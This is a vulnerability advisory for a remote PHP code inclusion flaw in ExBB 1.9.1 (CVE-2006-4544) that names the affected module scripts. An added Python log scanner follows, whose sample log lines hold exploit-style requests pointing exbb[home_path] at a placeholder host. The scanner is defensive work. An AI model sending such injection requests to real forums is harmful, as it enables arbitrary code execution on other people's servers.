PT-2006-5337 · Exbb · Exbb
Ahmad Maulana +1 · Published 2006-09-06 · Updated 2018-10-17 · CVE-2006-4544
CVSS v2.0: 7.5 (High)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions
ExBB version 1.9.1
Description
The issue allows remote attackers to execute arbitrary PHP code via a URL in the exbb[home_path] parameter in various files within the modules directory, including /birstday/birst.php, /birstday/select.php, /birstday/profile_show.php, /newusergreatings/pm_newreg.php, /punish/p_error.php, /punish/profile.php, and /threadstop/threadstop.php. This is possible when register_globals is enabled.
Recommendations
For ExBB version 1.9.1, consider disabling the register_globals setting to prevent exploitation. Additionally, restrict access to the vulnerable modules, including birstday, newusergreatings, punish, and threadstop, until a patch is available. Avoid using the exbb[home_path] parameter in the affected files.
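One way to check web server access logs for requests matching this advisory, as an added example that is not part of the original advisory or of ExBB: it flags requests to the listed module scripts that set exbb[home_path] in the query string, and grades them higher when the value starts like a URL. The log lines and hosts are constructed placeholders, and only query strings are inspected, so values sent by POST or cookie are not visible to it.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Module scripts named in the advisory, relative to the modules directory.
AFFECTED = (
    "birstday/birst.php", "birstday/select.php", "birstday/profile_show.php",
    "newusergreatings/pm_newreg.php", "punish/p_error.php",
    "punish/profile.php", "threadstop/threadstop.php",
)
PARAM = "exbb[home_path]"
REQUEST = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"\s*[a-z][a-z0-9+.-]+:", re.I)  # value starts like a URL

def classify(line):
    """Return None, 'param-set' or 'remote-url' for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return None
    try:
        url = urlsplit(m.group("target"))
    except ValueError:  # malformed request target, nothing to parse
        return None
    path = unquote(url.path).lower()
    if not any(path.endswith("/modules/" + s) for s in AFFECTED):
        return None  # scoped to the scripts the advisory lists
    verdict = None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM:  # parse_qsl has already decoded %5B and %5D
            # No legitimate client sets this variable; a URL value is worse.
            if SCHEME.match(value):
                return "remote-url"
            verdict = "param-set"
    return verdict

# Constructed sample lines (combined log format); hosts are placeholders.
SAMPLE = [
    '192.0.2.10 - - [06/Sep/2006:10:00:00 +0000] "GET /forum/modules/punish/profile.php?exbb%5Bhome_path%5D=http://files.example.invalid/ HTTP/1.1" 200 512',
    '192.0.2.11 - - [06/Sep/2006:10:00:05 +0000] "GET /forum/modules/birstday/birst.php?exbb[home_path]=./ HTTP/1.0" 200 80',
    '192.0.2.12 - - [06/Sep/2006:10:00:09 +0000] "GET /forum/modules/threadstop/threadstop.php HTTP/1.1" 200 80',
    '192.0.2.13 - - [06/Sep/2006:10:00:12 +0000] "GET /forum/index.php?exbb[home_path]=http://files.example.invalid/ HTTP/1.1" 200 90',
]

def scan(lines):
    """Map line index to verdict for every line that is flagged."""
    return {i: v for i, line in enumerate(lines) if (v := classify(line))}

if __name__ == "__main__":
    for i, verdict in scan(SAMPLE).items():
        print(verdict, SAMPLE[i].split()[0])
```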
Affected Products
Exbb